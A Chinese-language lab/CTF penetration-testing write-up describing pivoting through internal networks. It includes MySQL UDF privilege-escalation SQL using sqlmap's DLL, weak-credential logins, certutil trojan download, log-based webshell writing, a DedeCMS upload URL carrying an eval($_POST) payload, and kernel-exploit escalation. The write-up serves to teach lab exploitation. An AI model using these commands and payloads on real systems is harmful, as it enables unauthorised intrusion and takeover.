初级靶场
书接上回(入门靶场)
192.168.77.33成为了入口
入口信息收集
由于之前获取了77.33的管理员权限,可以直接登录系统。
查看存在的网卡,发现除了入门靶场的77段网卡以外还有两块网卡
那不直接扫他
10段的有1台机器
192.168.99段有四台机器,看着web服务感觉192.168.99.5和10.1.1.133是同一台机器。
全端口扫描了一下99段,又扫出来一些东西
10段机器
10.1.1.133=192.168.99.5
看了一下这两个段的端口,感觉10.1.1.133=192.168.99.5
但是存在ms17010,可以尝试一下
打了一波ms17010,没打动,寄
还有个数据库弱口令,root/root连接成功
使用udf提权
需要获取到udf提权的dll文件,sqlmap提供了现成的dll文件,在sqlmap\data\udf\mysql目录下,选择相应的系统版本和MySQL位数的文件。
由于文件被异或编码存放的,还需要进行解码,解码文件在sqlmap\extra\cloak目录下。
py -2 .\cloak.py -d -i H:\st\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_
select @@plugin_dir; //查找mysql目录
create table mysql.b(cmd LONGBLOB); //创建表
insert into mysql.b(cmd) values (hex(load_file('C:\HW-tools\综合扫描\漏扫工具\sqlmap\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll')));//将dll文件中的内容hex编码放入表中
SELECT unhex(cmd) FROM mysql.b INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin/uu.dll';//将表中内容写入到指定文件中
create function sys_eval returns string soname 'uu.dll'; //使用sys_eval函数命令执行
select sys_eval('whoami');
尝试添加用户,发现可以添加用户但是不能给他管理员权限
我直接改他管理员密码
然后就登上来了,嗯,360纯纯摆设,一点反应都没有。
而且还出网~
正式环境这么做可能被管理员都发现了,下面才是正儿八经的动作
利用certutil命令下载木马文件
直接执行这个木马
嘎嘎上线(这里ip变成137了是因为他是个动态ip)
192.168.99段
192.168.99.15
爆目录不知道嘛回事爆不出来,搞了个插件检测到是php解析的
盲猜phpstudy搭建的,试了一下phpstudy常见的目录
phpmyadmin也存在
root/root弱口令噶就登进去了~
尝试通过命令写入shell,使用show global variables like "secure%"
擦,没有权限
尝试通过日志写入shell,使用select @@datadir获取绝对路径
淦,死活解析不了,看看备份路径SHOW VARIABLES LIKE 'general%';
看了一下特喵的貌似是斜杠搞反了,被转义了,-_-||
重新执行,哎,这不就好起来了吗!
随便执行个小马,让它保存在日志中
人麻了,蚁剑和哥斯拉死活连不上,重来一遍试试
咱也不知道为啥,这次就好了
一顿执行命令,得出结论
- 是system权限
- 一个网卡不出网,只能通入口那台机器
- 有杀软
那就想办法搞个中转免杀喽
嗯,先试了一下没免杀的,也就直接上线了,那就不用费劲搞免杀了。嘿嘿。。。
192.168.99.7
一个织梦的站
还有个phpstudy探针(全端口扫出来的)
phpstudy探针尝试弱口令连接mysql失败
查看robots.txt获取目录,找到登录界面
爆破目录发现有备份文件
发现是备份的数据库数据,里面存在管理员的账户和md5值
直接给他登录
准备通过文件管理器上传一个马子,结果那个插件被删了,emmm~
只能文件上传了,嘎嘎找地方上传,我特么上传个正儿八经的图片都说我
哎,再找找别的地方
利用sys_verifies后台文件写入获取getshell,这貌似是个文件包含的洞
必须加上action=down参数才能解析
切换成get参数执行系统命令
windows的转义字符为^ 使用echo写入webshell
这个方法太鸡肋了,目标机器还不出网,用echo命令写个新的webshell又碰壁,难受~
又找了个后台文件上传的洞
DEDEC CMS v5.7 文件上传_小生迷途知返的博客-CSDN博客_dedecms文件上传
文件上传:
http://192.168.99.7/dedeadmin/tpl.php?filename=np666.lib.php&action=savetagfile&content=%3C?php%20phpinfo();@eval($_POST[%22cmd%22]);?%3E&token=c12bf4a8330732e9f45a492d54399803
webshell地址:
http://192.168.99.7/include/taglib/np666.lib.php
通过webshell上传一个cs马,直接执行上线
这个权限属实有点低,老办法针对2008R2服务器使用烂土豆提权。。。
这次啥土豆都不管用了,试了一圈洞都不行事
疯狂问度娘,看见一个CVE-2014-4113内核溢出漏洞
参考链接:
111.网络安全渗透测试-[权限提升篇9]-[Windows 2008 R2内核溢出提权]
还有github的poc地址
Kernelhub/CVE-2014-4113 at master · Ascotbe/Kernelhub
一键提权就是爽~!
192.168.99.3
扫描目录扫到一个数据库文件
下载后打开
直接登录
上传图片马
上传后会返回位置
在数据库备份的地方
对上传的图片进行备份
直接访问这个链接
哥斯拉连接马子
asp的权限太低,上传一个aspx的马子
权限还是低,但是可以执行命令了
使用iis6提权工具进行提权
顶,然后执行各种命令,发现这台机器不出网,貌似也没杀软
尝试上线,结果死活不上线,而且弄着弄着特喵的不解析aspx了,寄。
